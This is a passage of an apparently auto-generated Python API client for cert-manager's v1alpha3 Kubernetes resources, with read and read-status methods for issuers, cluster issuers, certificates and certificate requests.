if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/merge-patch+json', 'application/apply-patch+yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/issuers/{name}/status', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Issuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def read_cluster_issuer(self, name, **kwargs): # noqa: E501
"""read_cluster_issuer # noqa: E501
read the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_cluster_issuer(name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3ClusterIssuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.read_cluster_issuer_with_http_info(name, **kwargs) # noqa: E501
def read_cluster_issuer_with_http_info(self, name, **kwargs): # noqa: E501
"""read_cluster_issuer # noqa: E501
read the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_cluster_issuer_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3ClusterIssuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'pretty',
'resource_version'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method read_cluster_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `read_cluster_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/clusterissuers/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3ClusterIssuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def read_cluster_issuer_status(self, name, **kwargs): # noqa: E501
"""read_cluster_issuer_status # noqa: E501
read status of the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_cluster_issuer_status(name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3ClusterIssuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.read_cluster_issuer_status_with_http_info(name, **kwargs) # noqa: E501
def read_cluster_issuer_status_with_http_info(self, name, **kwargs): # noqa: E501
"""read_cluster_issuer_status # noqa: E501
read status of the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_cluster_issuer_status_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3ClusterIssuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'pretty',
'resource_version'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method read_cluster_issuer_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `read_cluster_issuer_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/clusterissuers/{name}/status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3ClusterIssuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def read_namespaced_certificate(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_certificate # noqa: E501
read the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_certificate(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Certificate
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.read_namespaced_certificate_with_http_info(name, namespace, **kwargs) # noqa: E501
def read_namespaced_certificate_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_certificate # noqa: E501
read the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_certificate_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Certificate, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'pretty',
'resource_version'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_certificate" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `read_namespaced_certificate`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `read_namespaced_certificate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificates/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Certificate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def read_namespaced_certificate_request(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_certificate_request # noqa: E501
read the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_certificate_request(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.read_namespaced_certificate_request_with_http_info(name, namespace, **kwargs) # noqa: E501
def read_namespaced_certificate_request_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_certificate_request # noqa: E501
read the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_certificate_request_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateRequest, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'pretty',
'resource_version'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_certificate_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `read_namespaced_certificate_request`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `read_namespaced_certificate_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificaterequests/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateRequest', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def read_namespaced_certificate_request_status(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_certificate_request_status # noqa: E501
read status of the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_certificate_request_status(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.read_namespaced_certificate_request_status_with_http_info(name, namespace, **kwargs) # noqa: E501
def read_namespaced_certificate_request_status_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_certificate_request_status # noqa: E501
read status of the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_certificate_request_status_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateRequest, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'pretty',
'resource_version'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_certificate_request_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `read_namespaced_certificate_request_status`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `read_namespaced_certificate_request_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificaterequests/{name}/status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateRequest', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def read_namespaced_certificate_status(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_certificate_status # noqa: E501
read status of the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_certificate_status(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Certificate
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.read_namespaced_certificate_status_with_http_info(name, namespace, **kwargs) # noqa: E501
def read_namespaced_certificate_status_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_certificate_status # noqa: E501
read status of the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_certificate_status_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Certificate, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'pretty',
'resource_version'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_certificate_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `read_namespaced_certificate_status`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `read_namespaced_certificate_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificates/{name}/status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Certificate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def read_namespaced_issuer(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_issuer # noqa: E501
read the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_issuer(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Issuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.read_namespaced_issuer_with_http_info(name, namespace, **kwargs) # noqa: E501
def read_namespaced_issuer_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_issuer # noqa: E501
read the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_issuer_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Issuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'pretty',
'resource_version'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `read_namespaced_issuer`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `read_namespaced_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/issuers/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Issuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def read_namespaced_issuer_status(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_issuer_status # noqa: E501
